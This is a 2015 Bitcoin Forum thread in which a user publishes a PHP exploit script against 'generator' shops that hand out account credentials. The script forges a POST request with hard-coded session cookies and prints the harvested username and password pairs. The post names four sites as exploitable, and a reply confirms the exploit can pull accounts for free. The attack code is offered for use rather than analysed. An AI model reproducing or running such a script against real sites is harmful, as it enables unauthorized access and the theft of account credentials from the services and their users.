Bitcoin Forum

Economy => Service Discussion => Topic started by: bobc1994 on September 28, 2015, 05:34:31 PM



Title: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 05:34:31 PM
Hey guys, so I have been contacting multiple gen shop owners about this exploit but they either become very defensive or just end up trying to make up lies. Then they begin to act very rude to me.

Update: after this announcement the owner of the script gave up and doesn't know how to fix the script lol

I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.

Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.

There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here

Alright so the exploit is PHP code that you can host anywhere. Don't bother asking me how to use this as you must already know what this does and how to use it.

The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! All he did was rename it, which can be confirmed by talking to the original owner.

Code:
<?
if($_GET['auth']=="max"){
$url = '';

$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  =>   "Host:
" .
                "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
                "X-Requested-With: XMLHttpRequest
" .
                "Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D


",
    ),
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>



Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com

Also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and it's not the ones above.


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: flystarjay on September 28, 2015, 05:41:51 PM
https://bitcointalk.org/index.php?topic=1194832.msg12540096#msg12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 05:44:41 PM
https://bitcointalk.org/index.php?topic=1194832.msg12540096#msg12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?

That version is fixed that I have but seems the owners are too hot headed to ignore me. So here I am.


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: Bluffer on September 28, 2015, 06:01:21 PM
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took too long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 06:04:32 PM
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took too long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.

You own a shop too?


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: Bluffer on September 28, 2015, 06:27:37 PM
I do run the best generator on Hackforums, yep.


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 06:52:04 PM
I do run the best generator on Hackforums, yep.


alright hit u up a pm


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: tifossi on September 28, 2015, 07:40:34 PM
Is it possible with this exploit that people can generate accounts for free?


Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 09:42:38 PM
Is it possible with this exploit that people can generate accounts for free?

yeah you can do a lot...

https://bitcointalk.org/index.php?topic=1148789.msg12546237#msg12546237